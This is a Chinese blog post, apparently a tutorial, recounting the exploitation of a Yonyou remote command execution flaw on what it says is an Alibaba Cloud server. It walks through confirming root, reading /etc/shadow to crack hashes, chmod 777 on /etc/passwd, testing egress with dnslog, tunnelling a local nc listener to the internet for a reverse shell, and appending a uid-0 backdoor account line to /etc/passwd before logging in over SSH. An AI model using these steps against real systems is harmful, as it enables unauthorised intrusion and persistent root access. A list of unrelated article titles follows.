用友的命令执行漏洞,print hello 发现可以执行命令 ,

whami 和id 都查一波权限,发现是root,呵呵,权限这么大,很好搞啊

ps -ef|grep sshd 查一波 发现可以ssh连接、
直接useradd 用户,但是整个shell无法给用户添加密码,无法远程登陆,怎么搞,直接读shadow哈希,爆破密码


爆破无结果,头大,怎么搞,思考5分钟,可以直接写passwd啊,试一波

在次查看shadow 居然没写进去,难道权限不对,ls -alrt /etc/passwd 发现权限是544 ,直接chmod 777 /etc/passwd 改权限,继续写,依然写不进去,换了各种姿势,都不行,难住我了,突然想起了nc反弹,
一般linux都装有nc,这个有没有,查一波

果然不错,有nc,通过dnslog查一下是否有外连


能ping通,果然能外连,那就可以通过nc反弹搞一波了,本地的攻击机在内网,内网穿透一波
我一般用https://www.uulap.com/ 大家也可以试试
将本地的6666端口映射到公网

本地建立监听 nc -l -n -v -p 6666

让目标机进行nc反弹


果然反弹回来了,直接上命令,加用户
echo ‘用户名:LRxM3nP3LOiYU:0:0:hello:/root:/bin/bash’ >> /etc/passwd

查看已经添加成功

直接ssh连接他,发现是阿里云的服务器

至此,教程结束

用友远程命令执行漏洞并提权相关推荐

  1. 用友NC远程命令执行漏洞通告

    用友NC远程命令执行漏洞通告 360-CERT [三六零CERT](javascript:void(0)

  2. 又被野外利用了!新曝光Office产品多个远程命令执行漏洞分析

    本文讲的是又被野外利用了!新曝光Office产品多个远程命令执行漏洞分析, 早在2015年,FireEye曾发布过两次关于Office的Encapsulated PostScript (EPS)图形文 ...

  3. 邮件传输代理Exim远程命令执行漏洞细节披露,影响全球近一半邮件服务器

    注意:是远程命令执行,不是远程代码执行 Exim是一个MTA(Mail Transfer Agent,邮件传输代理)服务器软件,该软件基于GPL协议开发,是一款开源软件.该软件主要运行于类UNIX系统 ...

  4. webmin远程命令执行漏洞(cve-2019-15107)深入分析

    漏洞描述 近日Webmin被发现存在一处远程命令执行漏洞,经过分析后,初步猜测其为一次后门植入事件. Webmin是目前功能最强大的基于Web的Unix系统管理工具.管理员通过浏览器访问Webmin的 ...

  5. 【注意】关于Redis存在远程命令执行漏洞的安全公告

    点击蓝色"程序猿DD"关注我 回复"资源"获取独家整理的学习资料! 来源:CNVD漏洞平台 安全公告编号:CNTA-2019-0024 2019年7月10日,国 ...

  6. rmi远程反序列化rce漏洞_Oracle WebLogic 反序列化远程命令执行漏洞预警

    报告编号:B6-2019-041901 报告来源:360-CERT 报告作者:360-CERT 更新日期:2019-04-19 0x00 事件背景 2019年4月17日,国家信息安全漏洞共享平台(CN ...

  7. jenkins java反序列化_Jenkins “Java 反序列化”过程远程命令执行漏洞

    ###漏洞原理 反序列化是指特定语言中将传递的对象序列化数据重新恢复为实例对象的过程,而在这个过程中会执行一系列的字节流解析和对象实例化操作用于恢复之前序列化时的对象.在原博文所提到的那些 Java ...

  8. ThinkPHP 5.0.x、5.1.x、5.2.x 全版本远程命令执行漏洞

    ThinkPHP 5.0.x.5.1.x.5.2.x 全版本远程代码执行漏洞 漏洞概述: ThinkPHP是一个快速.兼容而且简单的轻量级国产PHP开发框架.借鉴Struts框架的Action对象,同 ...

  9. 远程执行漏洞修复方案_请马上修复!SaltStack远程命令执行漏洞

    [漏洞预警]SaltStack远程命令执行漏洞(CVE-2020-11651.CVE-2020-11652) 2020年5月3日,阿里云应急响应中心监测到近日国外某安全团队披露了SaltStack存在 ...

最新文章

  1. gitlab之gitlab-ci和gitlab-runner二
  2. OpenGL硬件加速指南
  3. 统计php脚本执行时间的php扩展
  4. 在ubuntu下安显卡驱动
  5. ssm 使用中的一些问题
  6. python 判断目录和文件是否存在,若不存在即创建
  7. 批量关闭公众号推送_啥?微信又出新功能了?或将提醒用户关闭长期未读公众号推送...
  8. 我在博客园写博客的原因
  9. PATH变量,cp,mv,cat,more,less,head,tail命令举例
  10. 为什么手机网速太慢_手机明明是满格信号,为什么网速却非常慢?原来是这些功能在捣鬼...
  11. codeblocks中文编码问题
  12. Jetty9下生成Jetty使用的OBF格式的keystore密码
  13. 计算从1加到该整数的值c语言,C语言编程题库与解析1.doc
  14. velocity参数重新赋值_Velocity 语法详解
  15. 【c语言大作业】c语言编写贪吃蛇
  16. cookie二级域名和三级域名跨域实践
  17. 万字长文!面试官问你:自定义View跟绘制流程懂吗?帮你搞定面试官
  18. linux 汇编 push rbp,无法从汇编(yasm)代码调用64位Linux上的C标准库函数
  19. NYOJ_170聪明的kk
  20. 3D卷积网络论文阅读笔记

热门文章

  1. python 根据x的值和函数y=20+x2,计算y_new,算出y_new和y的差,记为delta_y。¶绘制x和delt_y的点图,并计算y的方差。有关方差的计算参阅数学资料。
  2. 2022年,计算机er保研选计科还是电信?
  3. 一度智信|关于拼多多店铺数据分析细节
  4. 用java如何画动物_用画小狗的方法来解释Java值传递
  5. jmeter beanshell关于小数参数定义转化
  6. 肖申克的救赎-救赎自己的心灵
  7. 设计一个自我介绍简单页面
  8. Numpy 学习专题(十)—— 大作业
  9. 苹果 微信发件 服务器,如何使用iPhone自带的邮件客户端管理企业邮箱?
  10. 【小说】玻璃碎片-第二章